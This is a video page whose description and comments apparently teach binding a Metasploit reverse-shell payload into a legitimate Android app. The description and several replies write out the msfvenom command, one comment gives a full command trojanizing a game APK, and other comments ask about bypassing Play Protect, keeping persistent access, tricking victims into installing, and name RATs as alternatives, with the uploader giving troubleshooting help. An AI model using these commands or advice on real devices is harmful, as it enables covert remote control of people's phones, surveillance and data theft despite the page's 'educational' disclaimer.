How hackers hacking any android mobile ?

Поделиться
HTML-код
  • Опубликовано: 18 сен 2023
  • #cybersecurity #hacking #android #kalilinux #hackingtools #msfvenom #malware #payload #offensivesecurity
    This educational tutorial video will teach you how hacker embed apk payload with legitimate apk.
    -----------------------------------------------------------------------------------
    LINKS:
    apktoolfix : github.com/graylagx2/apktoolf...
    Latest Apktool : apktool.org/
    -----------------------------------------------------------------------------------
    Command syntax:
    sudo msfvenom --platform android -x ~/Desktop/apktool_2.9.2.jar -p android/meter prefer/reverse_tcp LHOST=kalimachine
    Ip LPORT=any port number -f raw -o filename.apk
    I hope you enjoyed the video and found value in the content. We value your feedback, If you have any questions or suggestions feel free to post them in the comments section or contact us directly via our social platforms.
    NOTE: I am not sponsored by or affiliated with any of the products or services mentioned in this video, all opinions are my own based on personal experiences.
    DISCLAIMER: All information, techniques, and tools showcased in these videos are for educational and ethical penetration testing purposes ONLY. NEVER attempt to use this information to gain unauthorized access to systems without the EXPLICIT consent of its owners. This is a punishable offense by law in most countries.
    Follow Us on Social Platforms:
    Discord: / discord
    LinkedIn: / pber. .
    Telegram: t.me/pberacademy
    Show your support by
    ------------------------------------------
    LIKE | COMMENT | SHARE | SUBSCRIBE
    ------------------------------------------
    **THANK YOU ALL FOR WATCHING THIS VIDEO. HAPPY LEARNING AND SEE YOU SOON ALL WITH OTHER INTERESTING VIDEOS. **
  • НаукаНаука

Комментарии • 221

  • @muthups1
    @muthups1 9 месяцев назад +4

    Very good and we need more videos like this..

  • @uaebikers
    @uaebikers 27 дней назад +1

    Nice content. Short & straight to the point with step by step and not too noob-ish.
    Keep up the good work

  • @thenewlucknow5722
    @thenewlucknow5722 16 дней назад

    I have created a payload using Metasploit with the help of MSF Venom. When you open this payload, it requests permissions to access various things. If you grant permission, the payload runs. This is how a normal Metasploit payload works. Now, my issue is that I created the payload and I'm trying to install it on Android 14, but I'm encountering this error. I'll send an image. When I increase the SDK version, the error gets fixed, but then the payload doesn't ask for permissions like a normal APK does. It just installs. During editing, I didn't change any code other than increasing the target SDK version. Can you please help me with this?
    Any idea ?

  • @aditisharma5197
    @aditisharma5197 9 месяцев назад +5

    I was waiting for this video. Thank you very much sir

    • @pberacademy
      @pberacademy  9 месяцев назад

      Welcome

    • @user-qz8bf7nz6z
      @user-qz8bf7nz6z 7 месяцев назад

      ​@@pberacademyWhat is the issue of merging Payload?

  • @prathapmilky1678
    @prathapmilky1678 7 месяцев назад +3

    Your Great Sir lot of Respect...

    • @pberacademy
      @pberacademy  7 месяцев назад

      Appreciate your comment and support

  • @amine2475
    @amine2475 Месяц назад

    Does this work for Android 12 and above ?

  • @Rajan-sx8mg
    @Rajan-sx8mg 8 месяцев назад +2

    Good video very informative

  • @Allauddinlee007
    @Allauddinlee007 11 дней назад

    in real andriod phone it is detected and not working properly pls tell me another way

  • @deepeshraghuwanshi9727
    @deepeshraghuwanshi9727 3 дня назад

    Apk is not installing in device so unable to get the access

  • @HeartOfSuccess.00
    @HeartOfSuccess.00 8 месяцев назад +3

    LPORT=1.2.2. -F ra ?? Your camera is blocking evrything from here on out. Can you tell me what you wrote ? ( i am hearing imparied)

    • @pberacademy
      @pberacademy  7 месяцев назад +2

      Sorry for the inconvenience I will update the comment in description

    • @comonding
      @comonding 5 месяцев назад

      @@pberacademy I don't see the full command either. It would be very productive if a word or a txt were uploaded to follow a laboratory

    • @user-vq8pe9dd7e
      @user-vq8pe9dd7e 2 месяца назад

      @@pberacademy please just send it here at once, starting from the LPORT

  • @Henry-db1lc
    @Henry-db1lc 2 месяца назад +1

    Can this be used to trace a hacker that doesn't to appear to leave a footprint?

    • @pberacademy
      @pberacademy  2 месяца назад

      You can but depends upon the track left

  • @GlobalNewsBd71
    @GlobalNewsBd71 4 месяца назад +1

    great, nicely explained. thank you. want more like this

    • @pberacademy
      @pberacademy  4 месяца назад

      Glad to hear it

    • @pberacademy
      @pberacademy  4 месяца назад

      I would request to Watch my android hacking series also

  • @user-gu3uo2nm4d
    @user-gu3uo2nm4d 19 дней назад +1

    S sir u r video very diffrent and very knowledgeable for me from others

  • @loicdemakoue1101
    @loicdemakoue1101 9 месяцев назад +1

    your the boss, please I like this content, I waiting again.🙏🙏🙏

  • @Allauddinlee007
    @Allauddinlee007 11 дней назад

    It is not working on android 14

  • @maniox87
    @maniox87 Месяц назад

    does this work in Wide area network (WAN) or only in LAN ?

  • @PleaseHandleRachel
    @PleaseHandleRachel Месяц назад

    While I understand what you are literally saying I do not understand the terminology. I am a learner and you are an expert. 1 suggestion: add some captions. RUclipss cc aren't so great.

  • @prajwalpawar9237
    @prajwalpawar9237 6 месяцев назад +1

    Insted of apk can we use pdf or img

    • @pberacademy
      @pberacademy  6 месяцев назад

      No you cannot at the
      Moment

  • @unknown_person055
    @unknown_person055 6 месяцев назад

    Sir app showing you may have downloaded older version may it not work properly

    • @pberacademy
      @pberacademy  6 месяцев назад

      You can download the recent version from the pool website and install it for latest version

  • @NANIELMUNDO
    @NANIELMUNDO 3 месяца назад +1

    why are you using a previous version of android not the latest one so when i try to open my payload apk in the vectilm phone there is a notification saying tha this application is made of a previous version of android

    • @pberacademy
      @pberacademy  3 месяца назад +2

      I did testing n-1 to avoid video get flagged

    • @Loading_Code
      @Loading_Code Месяц назад

      😂

    • @NANIELMUNDO
      @NANIELMUNDO Месяц назад

      @@pberacademy by youtube ??

    • @NANIELMUNDO
      @NANIELMUNDO Месяц назад

      What are you laughing at ?​@@Loading_Code

  • @Dayangaming0734
    @Dayangaming0734 7 месяцев назад +1

    Sir can i do in android install (kali Linux) this process

    • @pberacademy
      @pberacademy  7 месяцев назад

      Elaborate your question little bit please

    • @Dayangaming0734
      @Dayangaming0734 7 месяцев назад

      @@pberacademy kali linux ko Android ma install kar ke usma try kar sakth ha kya?

  • @Atul_Bhardwaj
    @Atul_Bhardwaj 4 месяца назад

    Will it still work if at the time of apk installation on Target device Kali is not running? Also will the be connecting if I restart Kali?

    • @pberacademy
      @pberacademy  4 месяца назад

      Elaborate your question

    • @Atul_Bhardwaj
      @Atul_Bhardwaj 4 месяца назад +1

      @@pberacademy I see I messed up my English there. I wanted to know that is it necessary for us to be online or actively listening at the time of installation of application on target device? Also will it connect if I restart my VM?

    • @PrajjwalSaggar
      @PrajjwalSaggar 6 дней назад

      ​@@Atul_Bhardwaj bro did you find the answer to your question?

    • @Atul_Bhardwaj
      @Atul_Bhardwaj 6 дней назад

      @@PrajjwalSaggar no bro

  • @user-fu6nj8lv5b
    @user-fu6nj8lv5b 2 месяца назад +1

    Does it work for android 13 and so on version?

  • @Dayangaming0734
    @Dayangaming0734 8 месяцев назад +1

    Can i bind payload with freefire game apk.?

  • @user-bf3pq5ek3h
    @user-bf3pq5ek3h 4 месяца назад +1

    Please help sir 🙏🙏 How are you able to start the listener without the app asking for permissions? When I launch my app it asks to access contacts, files and more.. How do you make it so it does not ask? Much appreciated

    • @pberacademy
      @pberacademy  3 месяца назад

      Doesn’t matter depends upon the apk you use

  • @DeeJay2000
    @DeeJay2000 2 месяца назад

    Great content

  • @itspervez17
    @itspervez17 5 месяцев назад

    Excellent..

  • @samuelagyapong2709
    @samuelagyapong2709 2 месяца назад +1

    I can't create payload it comes as invalid payload:latform

    • @pberacademy
      @pberacademy  2 месяца назад

      Please check for the typo

  • @user-rq8ni2fc4w
    @user-rq8ni2fc4w 4 месяца назад +1

    Did you install this apk on your personal android device or on emulator?

  • @muhammedmishal471
    @muhammedmishal471 8 месяцев назад

    from where can i find these templates for the payloads

  • @pankajsuryawanshi1267
    @pankajsuryawanshi1267 4 месяца назад +1

    13:45 why there is a cut ? Play Protection detect kiya kya xD

  • @unknown_person055
    @unknown_person055 6 месяцев назад +1

    Apksignger not found showing pls help me bro

  • @riturajpushpam01
    @riturajpushpam01 4 месяца назад +4

    yes i know about this method... brother can i get contionous live session in this method........ i liked and subrd your channel...

    • @pberacademy
      @pberacademy  4 месяца назад +1

      Thanks

    • @riturajpushpam01
      @riturajpushpam01 4 месяца назад +2

      @@pberacademy yes im still watching your channels content...
      All are superb content here brother..... 😍..

    • @riturajpushpam01
      @riturajpushpam01 4 месяца назад +1

      @@pberacademy most welcome brother.. :)

    • @pberacademy
      @pberacademy  4 месяца назад

      Thank you

    • @pberacademy
      @pberacademy  4 месяца назад +1

      🙏

  • @samuelagyapong2709
    @samuelagyapong2709 2 месяца назад +1

    Why is payload invalid : latform

    • @pberacademy
      @pberacademy  2 месяца назад

      Check is there any typo and syntax is correct

  • @faizandingankar846
    @faizandingankar846 9 месяцев назад

    Can u tell how we can get access to android using bluebugging?

    • @pberacademy
      @pberacademy  9 месяцев назад

      You have to identify the vulnerabilities in blueblooth and reverse hardware signal engineering.

  • @rony8094
    @rony8094 9 месяцев назад +3

    can't see @7:57 . can anyone explain?

    • @pberacademy
      @pberacademy  9 месяцев назад +3

      -p (payload) Lhost Rhost -f raw - o (output path location)

  • @unknown_person055
    @unknown_person055 6 месяцев назад

    Sir it will work or not on more than android 11 versions

    • @pberacademy
      @pberacademy  6 месяцев назад

      It will work in any android version

    • @unknown_person055
      @unknown_person055 6 месяцев назад

      How i install apk tool in linux i am confusing

  • @ultimategamingshow90
    @ultimategamingshow90 6 месяцев назад +1

    Sir ye payload Android 13 me installed nhi ho rha to kya kre please reply

    • @pberacademy
      @pberacademy  6 месяцев назад

      Please repeat your question in English

    • @ultimategamingshow90
      @ultimategamingshow90 6 месяцев назад

      This payload not worked in Android 13

    • @ultimategamingshow90
      @ultimategamingshow90 6 месяцев назад

      This error is about to install time.
      Error : app not installed as package appears to be involved

  • @Surya_556
    @Surya_556 9 месяцев назад

    I was trying to run the msfvenom command, but i was getting an error of undefined method 'strip', how to overcome it. Please reply

    • @pberacademy
      @pberacademy  9 месяцев назад

      Provide me full command

    • @Surya_556
      @Surya_556 9 месяцев назад

      sudo msfvenom --platform android -x /home/surya/Desktop/game.apk -p android/meterpreter/reverse_tcp LHOST=myhost LPORT=4444 -f raw -o /home/surya/Desktop/game1.apk
      @@pberacademy

    • @Surya_556
      @Surya_556 9 месяцев назад

      Error: undefined method `strip' for nil:NilClass

    • @Surya_556
      @Surya_556 9 месяцев назад

      Can you please respond. What is the exact issue and how to resolve it

    • @pberacademy
      @pberacademy  9 месяцев назад

      Provide me full command what you are typing so that I can validate

  • @rajeevpuri8319
    @rajeevpuri8319 6 месяцев назад +2

    sir you are great.sir I want to be ethical hacker , please guide me how can i obtain my aim. thank you.❤❤

    • @pberacademy
      @pberacademy  6 месяцев назад +2

      Learn the concept and play capture the flag for hands on experience

  • @3t3rnitytv
    @3t3rnitytv Месяц назад

    hello it was working good i send the app on my phone and wen i want to install the app,is told me the app is for old android.The apk is problem or something else i made apk music player some help pls.

    • @pberacademy
      @pberacademy  Месяц назад

      It is fine check you got reverse shell

  • @SCLEDONFF
    @SCLEDONFF 3 месяца назад +1

    the main difficult thing is to force the victim to install the app🤣🤣

    • @pberacademy
      @pberacademy  3 месяца назад +1

      True but that is best way to

    • @SCLEDONFF
      @SCLEDONFF 3 месяца назад

      @@pberacademy another biggest problem is to bypass the android 12 or android 13 security

  • @mouzzzamjaddi2697
    @mouzzzamjaddi2697 8 месяцев назад +1

    how to install dependencies if anyone one of them missing?

    • @pberacademy
      @pberacademy  8 месяцев назад

      When you run the script it will install the required package .. if not manually install the missing package using identified name by the scripts

    • @mouzzzamjaddi2697
      @mouzzzamjaddi2697 8 месяцев назад

      Yes, it worked... Thank you

  • @unknown_person055
    @unknown_person055 6 месяцев назад +1

    Sir please make an video for this app was built for old version problem please

  • @sushildhote8952
    @sushildhote8952 3 месяца назад +1

    is there any way to create persistent sell ..???

    • @pberacademy
      @pberacademy  3 месяца назад

      Yes using vulnerability or cracking the hash

    • @sushildhote8952
      @sushildhote8952 3 месяца назад

      @@pberacademy so plz can you describe or upload a video about how to crack hash..???
      Because I searched more from google and RUclips but i didn't get information about how to get persistent shell

  • @user-vq8pe9dd7e
    @user-vq8pe9dd7e 2 месяца назад +1

    Please would this work on Android 12, 13 and 14

    • @pberacademy
      @pberacademy  2 месяца назад

      Yes it will

    • @user-vq8pe9dd7e
      @user-vq8pe9dd7e 2 месяца назад

      Okay, but please can you write out the last line here for me starting from the LPORT:17993 to the output when you were creating the payload, because your face camera actually blocked the last line of code.​@@pberacademy

  • @hiddengo3232
    @hiddengo3232 5 месяцев назад +1

    how to make it persist

    • @pberacademy
      @pberacademy  5 месяцев назад

      Videos is coming soon stay tuned

  • @TechToTek
    @TechToTek 8 месяцев назад +2

    Hello, thankyou it was a great video. But once we get a session I wanna know how to make it persistent. There are videos of a shell script, but that does not work if the victim device in unrooted. So do you have some info on that?

    • @pberacademy
      @pberacademy  8 месяцев назад

      Coming soon

    • @alenbenny2860
      @alenbenny2860 5 месяцев назад +2

      @@pberacademy please upload a video about it

    • @pberacademy
      @pberacademy  5 месяцев назад

      @alenbenny2860 sure

    • @alenbenny2860
      @alenbenny2860 5 месяцев назад +1

      @@pberacademy When, i'm still waiting.

    • @pberacademy
      @pberacademy  5 месяцев назад

      @alenbenny2860 working on it

  • @rohitashkumawat9172
    @rohitashkumawat9172 9 месяцев назад +1

    Sir how to bypass play protection please reply sir

    • @pberacademy
      @pberacademy  9 месяцев назад +1

      I have showed in the video ..check out …validate signature required to bypass

    • @dydfrancis1761
      @dydfrancis1761 9 месяцев назад

      ​@@pberacademysha1 is not working anymore whats the alternative

    • @user-vq8pe9dd7e
      @user-vq8pe9dd7e 2 месяца назад

      @@pberacademy please elaborate, I don't know how to bypass play protect

  • @unknown_person055
    @unknown_person055 6 месяцев назад

    Sir please give solution to this app is made for older version please please please please

  • @namanshah4655
    @namanshah4655 7 месяцев назад +2

    sir my apktool is not compiling this this apk that give an error like this : Error: apktool execution failed

    • @pberacademy
      @pberacademy  7 месяцев назад

      Please run the script. It will fix it

  • @7amody7e34
    @7amody7e34 9 месяцев назад +1

    Can you explain noip It's better than ngrok Leaves for open communication

    • @pberacademy
      @pberacademy  9 месяцев назад +1

      Sure I will

    • @7amody7e34
      @7amody7e34 9 месяцев назад +1

      @@pberacademy thanks bro

  • @Allauddinlee007
    @Allauddinlee007 11 дней назад

    pls upload a video on real android phone on latest version it is not working on my phone

  • @user-rd5rj6qf3h
    @user-rd5rj6qf3h 7 месяцев назад +1

    Sir, how hacker hack anyone mobile by just Ip address, Ip address se pura mobile kaise karte hain vo dekhavona.

    • @pberacademy
      @pberacademy  7 месяцев назад

      Using vulnerabilities and also if device exposed to publicly (Internet)

  • @isaacfrimpong9722
    @isaacfrimpong9722 9 месяцев назад +1

    You do all..thank you ..please can you help me to learn ethical hacking🙏

  • @motivational_guru_prashant
    @motivational_guru_prashant 9 месяцев назад +1

    This use Android 11 working?

  • @Dhiaali2024
    @Dhiaali2024 2 месяца назад

    Sir Why that not working in Android 12 ?😢 Please I need help

  • @tamimarabi2678
    @tamimarabi2678 7 месяцев назад

    it shows apksigner not found.plz help

    • @pberacademy
      @pberacademy  7 месяцев назад

      You have install the apksigner or run the preflight script to validate

  • @jacksparrowyt9048
    @jacksparrowyt9048 6 месяцев назад +1

    Small doubt... How to relogin with this app

    • @pberacademy
      @pberacademy  6 месяцев назад +1

      You have create persistence payload

    • @jojovipro
      @jojovipro 6 месяцев назад

      Same problem with android 12 and up

    • @pberacademy
      @pberacademy  6 месяцев назад +1

      @jojovipro let me test it

  • @deore1001
    @deore1001 5 месяцев назад

    The conversation we got from victims mobile ... Using ngrok is unbreakable... Or it can regain as per our need ... If any how condition ip of victims mobile or our changed so doesn't get affected on our connection....?

    • @pberacademy
      @pberacademy  5 месяцев назад +1

      Yes, that why we are using reverse proxy ngrok ..even ip address change the connection will pointing to ngrok.. we have not configured victims ip address in reverse only Kali Linux ip address we did it … but the connection will get terminated if network connection or victim rebooted that why persistence hacking technique exist .. maintaining access.. I hope I have answered your question.

  • @user-kn7bd2xu2f
    @user-kn7bd2xu2f 2 месяца назад

    Not working in Android 14 .... please help

    • @HiHi-qe2ky
      @HiHi-qe2ky 12 дней назад

      Any solution found?

  • @NANIELMUNDO
    @NANIELMUNDO Месяц назад

    It s not working at all

  • @prathapmilky1678
    @prathapmilky1678 7 месяцев назад +1

    ] I: Using Apktool 2.7.0
    I: Checking whether sources has changed...
    I: Smaling smali folder into classes.dex..
    Sir how to fix this Error you Know to fix this please Replay me sir...

    • @pberacademy
      @pberacademy  7 месяцев назад

      Go to apk tool website and install the latest version

  • @thisissparta9699
    @thisissparta9699 Месяц назад

    This support on android 14

  • @unknown_person055
    @unknown_person055 6 месяцев назад +1

    Zipaligner problem sir

  • @user-hc1fk1pq6q
    @user-hc1fk1pq6q 5 месяцев назад +1

    Sir, what is the continuation of the code after LPORT=17993 -f ray..... please continue sir, thank you

    • @pberacademy
      @pberacademy  5 месяцев назад

      I will share it shortly

    • @pberacademy
      @pberacademy  5 месяцев назад +2

      sudo msfvenom --platform android -x ~/Desktop/apktool_2.9.2.jar -p android/meter prefer/reverse_tcp LHOST=kalimachine
      Ip LPORT=any port number -f raw -o filename.apk

  • @dydfrancis1761
    @dydfrancis1761 9 месяцев назад +1

    how do we make it persistent anytime i want to connect back to the victim phone

    • @pberacademy
      @pberacademy  9 месяцев назад +1

      You have install another backup using vulnerabilities.

    • @Delusionel31
      @Delusionel31 9 месяцев назад +1

      Lol using metasploit payload to hack android is one of most idiotic thing you can do

    • @support778
      @support778 9 месяцев назад +1

      @@Delusionel31what the best tool to use

    • @Delusionel31
      @Delusionel31 9 месяцев назад

      @@support778 any kind of RAT like cypher RAT or Craxsrat

    • @pberacademy
      @pberacademy  9 месяцев назад +1

      Options are limitless.. this video is for educational tutorial only not for illegal purpose so consider all the fact using metasploit not bad idea

  • @user-qw6lu8qi6b
    @user-qw6lu8qi6b 7 месяцев назад +1

    SIR LPORT ke baad kya command hai ?

    • @pberacademy
      @pberacademy  6 месяцев назад

      Can you please repeat your question in English

  • @muhammadjawad7778
    @muhammadjawad7778 8 дней назад

    8:01
    Everything is hidden behind yiu

  • @fitnesstips7157
    @fitnesstips7157 8 месяцев назад

    persistence method sir

  • @AnthonyWay-vk4kl
    @AnthonyWay-vk4kl 4 месяца назад +1

    Hey bro you id a jam up job. I am going to start working on a home hacking lab, i will be documenting it and would appreciate any tips, solutions an any info can provide. Ill let you know when i get it off and running. I would appreciate the whole communitys advice, and maybe some of you will join me in this and build your own as well.

    • @pberacademy
      @pberacademy  4 месяца назад

      Sure definitely.. we can connect

  • @3ashayargaming447
    @3ashayargaming447 8 месяцев назад +1

    code 8:31 not show for about facecam please send code

    • @pberacademy
      @pberacademy  8 месяцев назад

      Please elaborate your query

    • @3ashayargaming447
      @3ashayargaming447 8 месяцев назад

      @@pberacademy-f but im no to show for end 8:31

  • @adityapraveen1612
    @adityapraveen1612 5 месяцев назад +3

    why is it not working in adroid version 13

    • @pberacademy
      @pberacademy  5 месяцев назад +1

      What you are trying

    • @timecop1983Two
      @timecop1983Two 5 месяцев назад

      Because the architecture is wrong of your payloaf

    • @StabloGaming
      @StabloGaming Месяц назад

      Brother same problem 😢 koi solution mile to batana

    • @NANIELMUNDO
      @NANIELMUNDO Месяц назад

      What did you said ???​@@pberacademy

  • @Soth0w76
    @Soth0w76 2 месяца назад

    Show me how an Android user hacks the PC. (Kali Nethunter)

  • @rajendralalan-my4ld
    @rajendralalan-my4ld 9 месяцев назад +1

    Dear make a video for iPhone

    • @pberacademy
      @pberacademy  9 месяцев назад

      I do not have jailbreaks iphone

  • @support778
    @support778 9 месяцев назад

    7:48 can tell me exactly what you typed because you are blocking what you are typing

    • @support778
      @support778 9 месяцев назад +1

      From -f

    • @pberacademy
      @pberacademy  9 месяцев назад

      That is out path where I want to save the file

    • @support778
      @support778 9 месяцев назад +1

      @@pberacademy can you write the rest of the command word for word please because you are blocking it if re watch your video
      You will see your self

    • @pberacademy
      @pberacademy  9 месяцев назад

      Sorry for the inconvenience

    • @pberacademy
      @pberacademy  9 месяцев назад

      -p (payload) Lhost Rhost -f raw - o (output path location)

  • @unknown_person055
    @unknown_person055 6 месяцев назад +1

    Apktool fix installing problem

  • @nanlali1721
    @nanlali1721 7 месяцев назад +1

    thanks

  • @user-yy2db2pv4x
    @user-yy2db2pv4x 7 месяцев назад

    Android 13 possible

  • @user-mh9bh6pc8j
    @user-mh9bh6pc8j 9 месяцев назад

    Your web cam hide some codes please remove next time

    • @pberacademy
      @pberacademy  9 месяцев назад +1

      Can you elaborate pls

    • @mandatieswar7547
      @mandatieswar7547 6 месяцев назад

      ​@@pberacademy at the time of you are creating a payload on metasploit the command is covered some of it by your webcam video on top

  • @unknown_person055
    @unknown_person055 6 месяцев назад +1

    Error in apksigner sir

    • @pberacademy
      @pberacademy  6 месяцев назад

      You should you have latest apktool

  • @unknown_person055
    @unknown_person055 6 месяцев назад +1

    Sir please make an video for this app was built for old version problem please